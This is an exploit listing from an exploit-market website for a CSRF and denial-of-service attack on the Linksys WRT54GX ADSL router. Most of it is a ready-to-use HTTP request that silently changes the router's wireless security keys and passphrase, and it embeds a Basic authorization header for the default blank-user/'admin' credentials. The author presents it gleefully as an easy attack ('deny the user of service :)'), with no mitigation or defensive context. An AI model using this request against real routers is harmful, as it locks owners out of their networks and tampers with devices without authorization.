[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Linksys WRT54GX (ADSL Router) CSRF & 'CSRF DOS'

Author
MegaManSec
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19617
Category
dos / poc
Date add
23-10-2012
Platform
hardware
###InterNot###
##MegaManSec##
##############
##############



#Title: Linksys WRT54GX (ADSL Router) CSRF & 'CSRF DOS'
#Vendor: Linksys.com
#Category: CSRF
#

###############
DOS - changing wireless password to deny the user of service :)
###############


Method:GET
URL: http://192.168.1.1/asp_setwireless_Security?passphrase=&submit_type=&submit_click=submit_click&security_mode=wep&Association_Mode=0&wl_key=1&wl_WEP_key=&wl_wep_bit=128&wl_passphrase=AAAAAAAAAAAAAAAAAAAAAAAAAA&wl_key1=AAAAAAAAAAAAAAAAAAAAAAAAAAAA&wl_key2=B1EAC03C7B572C75F8A231C741&wl_key3=AAAAAAAAAAAAAAAAAAAAAAAAAA&wl_key4=AAAAAAAAAAAAAAAAAAAAAAAAAA
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://192.168.1.1/
Authorization: Basic OmFkbWlu


##DEFAULT USER: BLANK
##DEFAULT PASSWORD: admin

##EASY CSRF!!!

#  0day.today [2024-12-23]  #